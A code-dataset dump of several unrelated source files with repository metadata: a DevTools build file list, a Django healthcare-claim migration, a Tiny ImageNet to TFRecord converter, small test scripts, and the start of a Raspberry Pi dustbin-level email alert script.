'front_end/ui/SplitView.js',
'front_end/ui/StackView.js',
'front_end/ui/StatusBarButton.js',
'front_end/ui/SuggestBox.js',
'front_end/ui/TabbedPane.js',
'front_end/ui/TextEditor.js',
'front_end/ui/TextPrompt.js',
'front_end/ui/TextUtils.js',
'front_end/ui/UIUtils.js',
'front_end/ui/View.js',
'front_end/ui/ViewportControl.js',
'front_end/ui/ZoomManager.js',
'front_end/ui/treeoutline.js',
],
'devtools_components_js_files': [
'front_end/components/CookiesTable.js',
'front_end/components/DockController.js',
'front_end/components/Drawer.js',
'front_end/components/DOMBreakpointsSidebarPane.js',
'front_end/components/DOMPresentationUtils.js',
'front_end/components/ExecutionContextSelector.js',
'front_end/components/ExtensionServerProxy.js',
'front_end/components/FilterBar.js',
'front_end/components/FilterSuggestionBuilder.js',
'front_end/components/FlameChart.js',
'front_end/components/HandlerRegistry.js',
'front_end/components/HelpScreen.js',
'front_end/components/InspectElementModeController.js',
'front_end/components/InspectedPagePlaceholder.js',
'front_end/components/InspectorView.js',
'front_end/components/NativeBreakpointsSidebarPane.js',
'front_end/components/ObjectPopoverHelper.js',
'front_end/components/ObjectPropertiesSection.js',
'front_end/components/OverviewGrid.js',
'front_end/components/Panel.js',
'front_end/components/PropertiesSection.js',
'front_end/components/SearchableView.js',
'front_end/components/Section.js',
'front_end/components/ShortcutsScreen.js',
'front_end/components/TimelineGrid.js',
'front_end/components/WorkerFrontendManager.js',
],
'devtools_main_js_files': [
'front_end/main/AdvancedApp.js',
'front_end/main/App.js',
'front_end/main/HelpScreenUntilReload.js',
'front_end/main/ScreencastApp.js',
'front_end/main/SimpleApp.js',
'front_end/main/Main.js',
],
'devtools_module_json_files': [
'front_end/audits/module.json',
'front_end/console/module.json',
'front_end/devices/module.json',
'front_end/elements/module.json',
'front_end/extensions/module.json',
'front_end/layers/module.json',
'front_end/main/module.json',
'front_end/network/module.json',
'front_end/profiler/module.json',
'front_end/resources/module.json',
'front_end/search/module.json',
'front_end/settings/module.json',
'front_end/source_frame/module.json',
'front_end/sources/module.json',
'front_end/timeline/module.json',
],
'all_devtools_files': [
'<@(devtools_core_js_files)',
'<@(devtools_modules_js_files)',
'<@(devtools_cm_css_files)',
'<@(devtools_cm_js_files)',
'<@(devtools_module_json_files)',
],
'devtools_standalone_files': [
'front_end/accelerometer.css',
'front_end/auditsPanel.css',
'front_end/breadcrumbList.css',
'front_end/breakpointsList.css',
'front_end/dataGrid.css',
'front_end/devicesView.css',
'front_end/elementsPanel.css',
'front_end/filter.css',
'front_end/filteredItemSelectionDialog.css',
'front_end/flameChart.css',
'front_end/heapProfiler.css',
'front_end/helpScreen.css',
'front_end/indexedDBViews.css',
'front_end/inspectorCommon.css',
'front_end/navigatorView.css',
'front_end/networkLogView.css',
'front_end/networkPanel.css',
'front_end/overrides.css',
'front_end/panelEnablerView.css',
'front_end/profilesPanel.css',
'front_end/resourceView.css',
'front_end/resourcesPanel.css',
'front_end/responsiveDesignView.css',
'front_end/revisionHistory.css',
'front_end/screencastView.css',
'front_end/sidebarPane.css',
'front_end/sourcesPanel.css',
'front_end/sourcesView.css',
'front_end/spectrum.css',
'front_end/splitView.css',
'front_end/suggestBox.css',
'front_end/timelinePanel.css',
'front_end/canvasProfiler.css',
'front_end/layersPanel.css',
],
'devtools_console_js_files': [
'front_end/console/ConsolePanel.js',
'front_end/console/ConsoleView.js',
'front_end/console/ConsoleViewMessage.js',
],
'devtools_search_js_files': [
'front_end/search/AdvancedSearchView.js',
'front_end/search/FileBasedSearchResultsPane.js',
'front_end/search/SourcesSearchScope.js',
],
'devtools_devices_js_files': [
'front_end/devices/DevicesView.js',
],
'devtools_settings_js_files': [
'front_end/settings/EditFileSystemDialog.js',
'front_end/settings/SettingsScreen.js',
],
'devtools_elements_js_files': [
'front_end/elements/DOMSyntaxHighlighter.js',
'front_end/elements/ElementsTreeOutline.js',
'front_end/elements/ElementsPanel.js',
'front_end/elements/EventListenersSidebarPane.js',
'front_end/elements/MetricsSidebarPane.js',
'front_end/elements/OverridesView.js',
'front_end/elements/PlatformFontsSidebarPane.js',
'front_end/elements/PropertiesSidebarPane.js',
'front_end/elements/RenderingOptionsView.js',
'front_end/elements/Spectrum.js',
'front_end/elements/StylesSidebarPane.js',
],
'devtools_extensions_js_files': [
'front_end/extensions/ExtensionAuditCategory.js',
'front_end/extensions/ExtensionPanel.js',
'front_end/extensions/ExtensionRegistryStub.js',
'front_end/extensions/ExtensionServer.js',
'front_end/extensions/ExtensionView.js',
'<@(devtools_extension_api_files)',
],
'devtools_resources_js_files': [
'front_end/resources/ApplicationCacheItemsView.js',
'front_end/resources/CookieItemsView.js',
'front_end/resources/DOMStorageItemsView.js',
'front_end/resources/DatabaseQueryView.js',
'front_end/resources/DatabaseTableView.js',
'front_end/resources/DirectoryContentView.js',
'front_end/resources/FileContentView.js',
'front_end/resources/FileSystemView.js',
'front_end/resources/IndexedDBViews.js',
'front_end/resources/ResourcesPanel.js',
],
'devtools_source_frame_js_files': [
'front_end/source_frame/CodeMirrorTextEditor.js',
'front_end/source_frame/CodeMirrorUtils.js',
'front_end/source_frame/FontView.js',
'front_end/source_frame/GoToLineDialog.js',
'front_end/source_frame/ImageView.js',
'front_end/source_frame/ResourceView.js',
'front_end/source_frame/SourceFrame.js',
],
'devtools_network_js_files': [
'front_end/network/HAREntry.js',
'front_end/network/NetworkItemView.js',
'front_end/network/RequestCookiesView.js',
'front_end/network/RequestHeadersView.js',
'front_end/network/RequestHTMLView.js',
'front_end/network/RequestJSONView.js',
'front_end/network/RequestPreviewView.js',
'front_end/network/RequestResponseView.js',
'front_end/network/RequestTimingView.js',
'front_end/network/RequestView.js',
'front_end/network/ResourceWebSocketFrameView.js',
'front_end/network/NetworkPanel.js',
],
'devtools_sources_js_files': [
'front_end/sources/BreakpointsSidebarPane.js',
'front_end/sources/CSSSourceFrame.js',
'front_end/sources/CallStackSidebarPane.js',
'front_end/sources/EditingLocationHistoryManager.js',
'front_end/sources/FilePathScoreFunction.js',
'front_end/sources/FilteredItemSelectionDialog.js',
'front_end/sources/InplaceFormatterEditorAction.js',
'front_end/sources/JavaScriptSourceFrame.js',
'front_end/sources/NavigatorView.js',
'front_end/sources/Placard.js',
'front_end/sources/RevisionHistoryView.js',
'front_end/sources/ScopeChainSidebarPane.js',
'front_end/sources/ScriptFormatter.js',
'front_end/sources/ScriptFormatterEditorAction.js',
'front_end/sources/SimpleHistoryManager.js',
'front_end/sources/SourcesNavigator.js',
'front_end/sources/SourcesPanel.js',
'front_end/sources/SourcesView.js',
'front_end/sources/StyleSheetOutlineDialog.js',
'front_end/sources/TabbedEditorContainer.js',
'front_end/sources/UISourceCodeFrame.js',
'front_end/sources/WatchExpressionsSidebarPane.js',
'front_end/sources/WorkersSidebarPane.js',
'front_end/sources/TargetsToolbar.js',
],
'devtools_timeline_js_files': [
'front_end/timeline/CountersGraph.js',
'front_end/timeline/Layers3DView.js',
'front_end/timeline/MemoryCountersGraph.js',
'front_end/timeline/TimelineFrameModel.js',
'front_end/timeline/TimelineJSProfile.js',
'front_end/timeline/TimelineModel.js',
'front_end/timeline/TimelineModelImpl.js',
'front_end/timeline/TimelinePresentationModel.js',
'front_end/timeline/TimelineOverviewPane.js',
'front_end/timeline/TimelineEventOverview.js',
'front_end/timeline/TimelineFlameChart.js',
'front_end/timeline/TimelineFrameOverview.js',
'front_end/timeline/TimelineMemoryOverview.js',
'front_end/timeline/TimelineUIUtils.js',
'front_end/timeline/TimelineUIUtilsImpl.js',
'front_end/timeline/TimelineView.js',
'front_end/timeline/TimelinePowerGraph.js',
'front_end/timeline/TimelinePowerOverview.js',
'front_end/timeline/TimelinePanel.js',
'front_end/timeline/TimelineTracingView.js',
'front_end/timeline/TimelineLayersView.js',
'front_end/timeline/TracingModel.js',
'front_end/timeline/TracingTimelineModel.js',
'front_end/timeline/TracingTimelineUIUtils.js',
'front_end/timeline/TransformController.js'
],
'devtools_profiler_js_files': [
'front_end/profiler/CPUProfileBottomUpDataGrid.js',
'front_end/profiler/CPUProfileDataGrid.js',
'front_end/profiler/CPUProfileFlameChart.js',
'front_end/profiler/CPUProfileTopDownDataGrid.js',
'front_end/profiler/CPUProfileView.js',
'front_end/profiler/HeapSnapshotCommon.js',
'front_end/profiler/HeapSnapshotDataGrids.js',
'front_end/profiler/HeapSnapshotGridNodes.js',
'front_end/profiler/HeapSnapshotProxy.js',
'front_end/profiler/HeapSnapshotView.js',
'front_end/profiler/ProfilesPanel.js',
'front_end/profiler/ProfileLauncherView.js',
'front_end/profiler/CanvasProfileView.js',
'front_end/profiler/CanvasReplayStateView.js',
],
'devtools_heap_snapshot_worker_js_files': [
'front_end/ui/TextUtils.js',
'front_end/common/UIString.js',
'front_end/common/utilities.js',
'front_end/profiler/HeapSnapshotCommon.js',
'front_end/profiler/heap_snapshot_worker/AllocationProfile.js',
'front_end/profiler/heap_snapshot_worker/HeapSnapshot.js',
'front_end/profiler/heap_snapshot_worker/HeapSnapshotLoader.js',
'front_end/profiler/heap_snapshot_worker/HeapSnapshotWorker.js',
'front_end/profiler/heap_snapshot_worker/HeapSnapshotWorkerDispatcher.js',
'front_end/profiler/heap_snapshot_worker/JSHeapSnapshot.js',
],
'devtools_audits_js_files': [
'front_end/audits/AuditCategories.js',
'front_end/audits/AuditCategory.js',
'front_end/audits/AuditController.js',
'front_end/audits/AuditFormatters.js',
'front_end/audits/AuditLauncherView.js',
'front_end/audits/AuditResultView.js',
'front_end/audits/AuditRules.js',
'front_end/audits/AuditsPanel.js',
],
'devtools_cm_css_files': [
'front_end/cm/cmdevtools.css',
'front_end/cm/codemirror.css',
],
'devtools_cm_js_files': [
'front_end/cm/clike.js',
'front_end/cm/closebrackets.js',
'front_end/cm/codemirror.js',
'front_end/cm/coffeescript.js',
'front_end/cm/comment.js',
'front_end/cm/css.js',
'front_end/cm/headlesscodemirror.js',
'front_end/cm/htmlembedded.js',
'front_end/cm/htmlmixed.js',
'front_end/cm/javascript.js',
'front_end/cm/markselection.js',
'front_end/cm/matchbrackets.js',
'front_end/cm/overlay.js',
'front_end/cm/php.js',
'front_end/cm/python.js',
'front_end/cm/shell.js',
'front_end/cm/xml.js',
],
'devtools_modules_js_files': [
'<@(devtools_console_js_files)',
'<@(devtools_search_js_files)',
'<@(devtools_devices_js_files)',
'<@(devtools_elements_js_files)',
'<@(devtools_extensions_js_files)',
'<@(devtools_resources_js_files)',
'<@(devtools_network_js_files)',
'<@(devtools_source_frame_js_files)',
'<@(devtools_sources_js_files)',
'<@(devtools_timeline_js_files)',
'<@(devtools_profiler_js_files)',
'<@(devtools_audits_js_files)',
'<@(devtools_layers_js_files)',
'<@(devtools_heap_snapshot_worker_js_files)',
'<@(devtools_temp_storage_shared_worker_js_files)',
'<@(devtools_script_formatter_worker_js_files)',
'<@(devtools_uglify_files)',
],
'devtools_uglify_files': [
'front_end/UglifyJS/parse-js.js',
],
'devtools_image_files': [
'front_end/Images/addIcon.png',
'front_end/Images/applicationCache.png',
'front_end/Images/back.png',
'front_end/Images/breakpoint.png',
'front_end/Images/breakpoint_2x.png',
'front_end/Images/breakpointConditional.png',
'front_end/Images/breakpointConditional_2x.png',
'front_end/Images/checker.png',
'front_end/Images/cookie.png',
'front_end/Images/database.png',
'front_end/Images/databaseTable.png',
'front_end/Images/deleteIcon.png',
'front_end/Images/domain.png',
'front_end/Images/forward.png',
'front_end/Images/fileSystem.png',
'front_end/Images/frame.png',
'front_end/Images/graphLabelCalloutLeft.png',
'front_end/Images/graphLabelCalloutRight.png',
'front_end/Images/indexedDB.png',
'front_end/Images/indexedDBObjectStore.png',
'front_end/Images/indexedDBIndex.png',
'front_end/Images/localStorage.png',
'front_end/Images/navigationControls.png',
'front_end/Images/navigationControls_2x.png',
'front_end/Images/paneAddButtons.png',
'front_end/Images/paneElementStateButtons.png',
'front_end/Images/paneFilterButtons.png',
'front_end/Images/paneRefreshButtons.png',
'front_end/Images/paneSettingsButtons.png',
'front_end/Images/popoverArrows.png',
'front_end/Images/popoverBackground.png',
'front_end/Images/profileGroupIcon.png',
'front_end/Images/profileIcon.png',
'front_end/Images/profileSmallIcon.png',
'front_end/Images/radioDot.png',
'front_end/Images/resourceCSSIcon.png',
'front_end/Images/resourceDocumentIcon.png',
'front_end/Images/resourceDocumentIconSmall.png',
'front_end/Images/resourceJSIcon.png',
'front_end/Images/resourcePlainIcon.png',
'front_end/Images/resourcePlainIconSmall.png',
'front_end/Images/resourcesTimeGraphIcon.png',
'front_end/Images/responsiveDesign.png',
'front_end/Images/responsiveDesign_2x.png',
'front_end/Images/searchNext.png',
'front_end/Images/searchPrev.png',
'front_end/Images/sessionStorage.png',
'front_end/Images/settingsListRemove.png',
'front_end/Images/settingsListRemove_2x.png',
'front_end/Images/statusbarButtonGlyphs.png',
'front_end/Images/statusbarButtonGlyphs_2x.png',
'front_end/Images/statusbarResizerHorizontal.png',
'front_end/Images/statusbarResizerVertical.png',
'front_end/Images/thumbActiveHoriz.png',
'front_end/Images/thumbActiveVert.png',
'front_end/Images/thumbHoriz.png',
'front_end/Images/thumbVert.png',
'front_end/Images/thumbHoverHoriz.png',
'front_end/Images/thumbHoverVert.png',
'front_end/Images/toolbarItemSelected.png',
'front_end/Images/trackHoriz.png',
'front_end/Images/trackVert.png',
],
'devtools_layers_js_files': [
'front_end/layers/LayersPanel.js',
'front_end/layers/LayerTreeOutline.js',
'front_end/layers/LayerDetailsView.js',
'front_end/layers/PaintProfilerView.js',
'front_end/layers/LayerPaintProfilerView.js'
],
'devtools_extension_api_files': [
'front_end/extensions/ExtensionAPI.js',
],
'devtools_temp_storage_shared_worker_js_files': [
'front_end/temp_storage_shared_worker/TempStorageSharedWorker.js',
],
'devtools_script_formatter_worker_js_files': [
'front_end/script_formatter_worker/CSSFormatter.js',
'front_end/script_formatter_worker/JavaScriptFormatter.js',
'front_end/script_formatter_worker/ScriptFormatterWorker.js',
'front_end/common/utilities.js',
],
},
}
|
[
"mrobbeloth@pdiarm.com"
] |
mrobbeloth@pdiarm.com
|
849af73f4af5fb0fcdfd30a8278320d74ec2f664
|
ab4f74d127bfc89813ee359bb9c779eca5426ddc
|
/script/label_image.runfiles/org_tensorflow/tensorflow/contrib/slim/python/slim/summaries.py
|
92cbdf8b09354cbddfd0203055d7827b13efb286
|
[
"MIT"
] |
permissive
|
harshit-jain-git/ImageNET
|
cdfd5a340b62862ad8d1cc3b9a0f30cccc481744
|
1cd4c2b70917e4709ce75422c0205fe3735a1b01
|
refs/heads/master
| 2022-12-11T12:47:46.795376
| 2017-12-19T05:47:26
| 2017-12-19T05:47:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 94
|
py
|
/home/co/Documents/ImageClassifier/tensorflow/tensorflow/contrib/slim/python/slim/summaries.py
|
[
"harshitjain1371999@gmail.com"
] |
harshitjain1371999@gmail.com
|
d4fb859c1c32e4e140058d6eae83a7ca3c90cc99
|
6462a085be913f1164de4beecfef44cfd1b8c280
|
/src/tests/test_handler.py
|
3f04062ef23cd4945d9daad756d0b4822e4b8cfe
|
[] |
no_license
|
perkdrew/softrobot-backend
|
2472dbd7189ace1269a54ea77fcc390546cecf89
|
821574b7c47505a3e54a02526cfa14ca21bfe85b
|
refs/heads/main
| 2023-06-21T17:15:34.701070
| 2021-07-25T23:33:00
| 2021-07-25T23:33:00
| 388,159,802
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 59
|
py
|
import pytest, requests
def server(host, port):
pass
|
[
"drew@manivadigital.com"
] |
drew@manivadigital.com
|
aaff714536d0fb5e77c4def099d2dea4223ff9d6
|
b0e6bf9053a820d4f2c8884d89bfe7889910c84d
|
/healthcare/migrations/0028_rx_claim.py
|
0829d75ba8a950ebee86b3270aa46345f2cde827
|
[] |
no_license
|
fzqr7y/RCG-enable-Demo---HealthCare
|
acac76c64072681365cc1282f0bea59713863cfb
|
414f90ffc39c6b515aff2a4937d254ea81736207
|
refs/heads/master
| 2021-01-17T18:56:36.420354
| 2016-10-21T19:27:33
| 2016-10-21T19:27:33
| 71,597,565
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,103
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-09-12 21:52
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('healthcare', '0027_auto_20160909_1703'),
]
operations = [
migrations.CreateModel(
name='Rx_Claim',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateTimeField(auto_now_add=True)),
('modified_date', models.DateTimeField(auto_now=True)),
('drug_ndc', models.CharField(max_length=12)),
('drug_name', models.CharField(max_length=20)),
('drug_details', models.CharField(max_length=40)),
('drug_type', models.CharField(max_length=20)),
('therapeutic_class', models.CharField(max_length=20)),
('pharmacy_name', models.CharField(max_length=20)),
('pharmacy_key', models.CharField(max_length=20)),
('city', models.CharField(max_length=20)),
('state', models.CharField(max_length=2)),
('zip', models.CharField(max_length=10)),
('phone', models.CharField(max_length=20)),
('email', models.CharField(max_length=40)),
('prescription_ref', models.CharField(max_length=20)),
('prescribed_date', models.DateTimeField()),
('filled_date', models.DateTimeField()),
('refills_remaining', models.DecimalField(decimal_places=0, max_digits=2)),
('script_quantity', models.DecimalField(decimal_places=2, max_digits=8)),
('script_units', models.CharField(max_length=10)),
('days_supply', models.DecimalField(decimal_places=0, max_digits=4)),
('dose', models.DecimalField(decimal_places=4, max_digits=10)),
('dose_units', models.CharField(max_length=10)),
('take_quantity', models.DecimalField(decimal_places=2, max_digits=8)),
('take_units', models.CharField(max_length=10)),
('take_frequency', models.DecimalField(decimal_places=0, max_digits=2)),
('frequency_units', models.CharField(max_length=10)),
('billed', models.DecimalField(decimal_places=2, max_digits=8)),
('allowed', models.DecimalField(decimal_places=2, max_digits=8)),
('plan_paid', models.DecimalField(decimal_places=2, max_digits=8)),
('member_paid', models.DecimalField(decimal_places=2, max_digits=8)),
('plan_deductible', models.DecimalField(decimal_places=2, max_digits=8)),
('member', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='healthcare.Member')),
('provider', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='healthcare.Provider')),
],
),
]
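# Applied with the standard Django workflow (command shown for illustration):
#   python manage.py migrate healthcare 0028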
|
[
"swchesney@gmail.com"
] |
swchesney@gmail.com
|
445d942ea4ffebd2dbe2302f9dd02885998a1ada
|
39d4504ec1da8975fac526d6801b94f4348b6b61
|
/research/adversarial_logit_pairing/tiny_imagenet_converter/converter.py
|
6925cceae9319d3bc9c2b8f585800b65199ee130
|
[
"Apache-2.0"
] |
permissive
|
vincentcheny/models
|
fe0ff5888e6ee00a0d4fa5ee14154acdbeebe7ad
|
afb1a59fc1bc792ac72d1a3e22e2469020529788
|
refs/heads/master
| 2020-07-23T21:38:24.559521
| 2019-11-15T07:50:11
| 2019-11-15T07:50:11
| 207,712,649
| 1
| 0
|
Apache-2.0
| 2019-09-11T03:12:31
| 2019-09-11T03:12:31
| null |
UTF-8
|
Python
| false
| false
| 9,410
|
py
|
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts Tiny Imagenet dataset into TFRecord format.
As an output this program generates following files in TFRecord format:
- train.tfrecord
- validation.tfrecord
- test.tfrecord
Generated train and validation files will contain tf.Example entries with
following features:
- image/encoded - encoded image
- image/format - image format
- label/wnid - label WordNet ID
- label/imagenet - imagenet label [1 ... 1000]
- label/tiny_imagenet - tiny imagenet label [0 ... 199]
- bbox/xmin
- bbox/ymin
- bbox/xmax
- bbox/ymax
Test file will contain entries with 'image/encoded' and 'image/format' features.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import os
import random
from absl import app
from absl import flags
from absl import logging
import pandas as pd
import tensorflow as tf
FLAGS = flags.FLAGS
flags.DEFINE_string('input_dir', '', 'Input directory')
flags.DEFINE_string('output_dir', '', 'Output directory')
flags.DEFINE_string('imagenet_synsets_path', '',
'Optional path to /imagenet_lsvrc_2015_synsets.txt')
ImageMetadata = namedtuple('ImageMetadata', ['label', 'x1', 'y1', 'x2', 'y2'])
class WnIdToNodeIdConverter(object):
"""Converts WordNet IDs to numerical labels."""
def __init__(self, wnids_path, background_class):
self._wnid_to_node_id = {}
self._node_id_to_wnid = {}
with tf.gfile.Open(wnids_path) as f:
wnids_sequence = [wnid.strip() for wnid in f.readlines() if wnid.strip()]
node_id_offset = 1 if background_class else 0
for i, label in enumerate(wnids_sequence):
self._wnid_to_node_id[label] = i + node_id_offset
self._node_id_to_wnid[i + node_id_offset] = label
def to_node_id(self, wnid):
return self._wnid_to_node_id[wnid]
def to_wnid(self, node_id):
return self._node_id_to_wnid[node_id]
def all_wnids(self):
return self._wnid_to_node_id.keys()
def read_tiny_imagenet_annotations(annotations_filename,
images_dir,
one_label=None):
"""Reads one file with Tiny Imagenet annotations."""
result = []
if one_label:
column_names = ['filename', 'x1', 'y1', 'x2', 'y2']
else:
column_names = ['filename', 'label', 'x1', 'y1', 'x2', 'y2']
with tf.gfile.Open(annotations_filename) as f:
data = pd.read_csv(f, sep='\t', names=column_names)
for row in data.itertuples():
label = one_label if one_label else getattr(row, 'label')
full_filename = os.path.join(images_dir, getattr(row, 'filename'))
result.append((full_filename,
ImageMetadata(label=label,
x1=getattr(row, 'x1'),
y1=getattr(row, 'y1'),
x2=getattr(row, 'x2'),
y2=getattr(row, 'y2'))))
return result
def read_validation_annotations(validation_dir):
"""Reads validation data annotations."""
return read_tiny_imagenet_annotations(
os.path.join(validation_dir, 'val_annotations.txt'),
os.path.join(validation_dir, 'images'))
def read_training_annotations(training_dir):
"""Reads training data annotations."""
result = []
sub_dirs = tf.gfile.ListDirectory(training_dir)
for sub_dir in sub_dirs:
if not sub_dir.startswith('n'):
logging.warning('Found non-class directory in training dir: %s', sub_dir)
continue
sub_dir_results = read_tiny_imagenet_annotations(
os.path.join(training_dir, sub_dir, sub_dir + '_boxes.txt'),
os.path.join(training_dir, sub_dir, 'images'),
one_label=sub_dir)
result.extend(sub_dir_results)
return result
def read_test_annotations(test_dir):
"""Reads test data annotations."""
files = tf.gfile.ListDirectory(os.path.join(test_dir, 'images'))
return [(os.path.join(test_dir, 'images', f), None)
for f in files if f.endswith('.JPEG')]
def get_image_format(filename):
"""Returns image format from filename."""
filename = filename.lower()
if filename.endswith('jpeg') or filename.endswith('jpg'):
return 'jpeg'
elif filename.endswith('png'):
return 'png'
else:
raise ValueError('Unrecognized file format: %s' % filename)
class TinyImagenetWriter(object):
"""Helper class which writes Tiny Imagenet dataset into TFRecord file."""
  def __init__(self, tiny_imagenet_wnid_converter, imagenet_wnid_converter):
    self.tiny_imagenet_wnid_converter = tiny_imagenet_wnid_converter
    self.imagenet_wnid_converter = imagenet_wnid_converter
def write_tf_record(self,
annotations,
output_file):
"""Generates TFRecord file from given list of annotations."""
with tf.python_io.TFRecordWriter(output_file) as writer:
for image_filename, image_metadata in annotations:
with tf.gfile.Open(image_filename) as f:
image_buffer = f.read()
image_format = get_image_format(image_filename)
features = {
'image/encoded': tf.train.Feature(
bytes_list=tf.train.BytesList(value=[image_buffer])),
'image/format': tf.train.Feature(
bytes_list=tf.train.BytesList(value=[image_format]))
}
if image_metadata:
# bounding box features
features['bbox/xmin'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[image_metadata.x1]))
features['bbox/ymin'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[image_metadata.y1]))
features['bbox/xmax'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[image_metadata.x2]))
features['bbox/ymax'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[image_metadata.y2]))
          # tiny imagenet label, from [0, 200) interval
          tiny_imagenet_label = self.tiny_imagenet_wnid_converter.to_node_id(
              image_metadata.label)
          features['label/wnid'] = tf.train.Feature(
              bytes_list=tf.train.BytesList(value=[image_metadata.label]))
features['label/tiny_imagenet'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[tiny_imagenet_label]))
# full imagenet label, from [1, 1001) interval
if self.imagenet_wnid_converter:
imagenet_label = self.imagenet_wnid_converter.to_node_id(
image_metadata.label)
features['label/imagenet'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[imagenet_label]))
example = tf.train.Example(features=tf.train.Features(feature=features))
writer.write(example.SerializeToString())
def main(_):
assert FLAGS.input_dir, 'Input directory must be provided'
assert FLAGS.output_dir, 'Output directory must be provided'
  # Create WordNet ID converters for tiny imagenet and possibly for imagenet
  tiny_imagenet_wnid_converter = WnIdToNodeIdConverter(
os.path.join(FLAGS.input_dir, 'wnids.txt'),
background_class=False)
if FLAGS.imagenet_synsets_path:
imagenet_wnid_converter = WnIdToNodeIdConverter(FLAGS.imagenet_synsets_path,
background_class=True)
else:
imagenet_wnid_converter = None
# read tiny imagenet annotations
train_annotations = read_training_annotations(
os.path.join(FLAGS.input_dir, 'train'))
random.shuffle(train_annotations)
val_annotations = read_validation_annotations(
os.path.join(FLAGS.input_dir, 'val'))
test_filenames = read_test_annotations(os.path.join(FLAGS.input_dir, 'test'))
# Generate TFRecord files
  writer = TinyImagenetWriter(tiny_imagenet_wnid_converter,
imagenet_wnid_converter)
tf.logging.info('Converting %d training images', len(train_annotations))
writer.write_tf_record(train_annotations,
os.path.join(FLAGS.output_dir, 'train.tfrecord'))
tf.logging.info('Converting %d validation images ', len(val_annotations))
writer.write_tf_record(val_annotations,
os.path.join(FLAGS.output_dir, 'validation.tfrecord'))
tf.logging.info('Converting %d test images', len(test_filenames))
writer.write_tf_record(test_filenames,
os.path.join(FLAGS.output_dir, 'test.tfrecord'))
tf.logging.info('All files are converted')
if __name__ == '__main__':
app.run(main)
|
[
"1155107977@link.cuhk.edu.hk"
] |
1155107977@link.cuhk.edu.hk
|
239fdf3de10fa59e880d57dccdeaa8645206165a
|
c3d210e8321afff93ff0b2ea8c304fa4a02a6c04
|
/spk/deluge/src/app/deluge.cgi.py
|
ae747dbdd9559b7c61d37c7bd6bcded603540110
|
[
"BSD-3-Clause"
] |
permissive
|
cytec/spksrc
|
90da6b0542ebca743c6e527626f1f8cfefb040df
|
a955d47d89f080bd9c4362af4ae80da0afbf4e43
|
refs/heads/develop
| 2020-04-05T22:43:22.797226
| 2014-08-19T10:14:10
| 2014-08-19T10:14:10
| 7,053,717
| 4
| 4
| null | 2018-04-19T10:13:09
| 2012-12-07T13:36:45
|
Shell
|
UTF-8
|
Python
| false
| false
| 159
|
py
|
#!/usr/local/deluge/env/bin/python
import os
protocol = 'http'
port = 8112
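# A CGI response consists of header lines followed by a blank line; the bare
# print below emits that mandatory blank line after the redirect header.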
print 'Location: %s://%s:%d' % (protocol, os.environ['SERVER_NAME'], port)
print
|
[
"diaoulael@gmail.com"
] |
diaoulael@gmail.com
|
15c21aa0fe33a8dd08ee06da88a96d254f592d0b
|
85be01c0a86e72553f24cd6f88bb91c4343a6863
|
/test.py
|
0f209cbe8df41eb48766bfd0664772c2174d338e
|
[
"Apache-2.0"
] |
permissive
|
wurentidai/ELMO
|
8463783def52c77cc74e5385d9bc3523a5c6b54b
|
7df92cc25b0d7e5238ad1821d973a0a56aaa6315
|
refs/heads/master
| 2020-06-01T08:46:29.004700
| 2019-06-06T09:56:42
| 2019-06-06T09:56:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 402
|
py
|
import numpy as np
char_inputs = np.zeros([2, 1, 3], np.int32)
res = np.vstack([[1, 2, 3]] + [[4, 5, 6]])
# char_inputs[0, 0, :] = res[0:1]
# print(res)  # [[1, 2, 3], [4, 5, 6]]
# print(res + 1)
import tensorflow as tf
with tf.Session() as sess:
    z = tf.random_normal((3, 4, 2), mean=0.0, stddev=1.0, dtype=tf.float32)
    f = tf.unstack(z, axis=1)
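    # z has shape (3, 4, 2); unstacking along axis=1 yields a list of four
    # tensors, each of shape (3, 2).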
print(sess.run([z,f]))
|
[
"1187663089@qq.com"
] |
1187663089@qq.com
|
35e13bd1380af1bac9dcf5f5cc0bb2f542369fb9
|
aa5db6a1531d07f56e675e89017cc653d663cb9c
|
/newmail.py
|
d5d83fe5f2371716820ca9733ed8837940675ba5
|
[] |
no_license
|
arundhatighose/SmartDustbin
|
523ff98a2255fdc367ad9fd94d6998aeaf50a2fd
|
55cbf749d8f8f62e0beebe3c4fe5de5166a9e28e
|
refs/heads/master
| 2020-03-24T04:11:42.080593
| 2018-07-26T14:03:34
| 2018-07-26T14:03:34
| 142,440,528
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,949
|
py
|
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
import smbus
import time
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
TRIG = 23
ECHO = 24
GPIO.setwarnings(False)
print "Distance measurement in progress"
GPIO.setup(TRIG,GPIO.OUT)
GPIO.setup(ECHO,GPIO.IN)
fromaddr= "teamshiledinternity@gmail.com"
toaddr= "ghosearundhati96@gmail.com"
msg=MIMEMultipart()
msg['From']=fromaddr
msg['to']=toaddr
msg['subject']='garbage level'
bus = smbus.SMBus(1)
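# The device at I2C address 0x53 matches an ADXL345 accelerometer:
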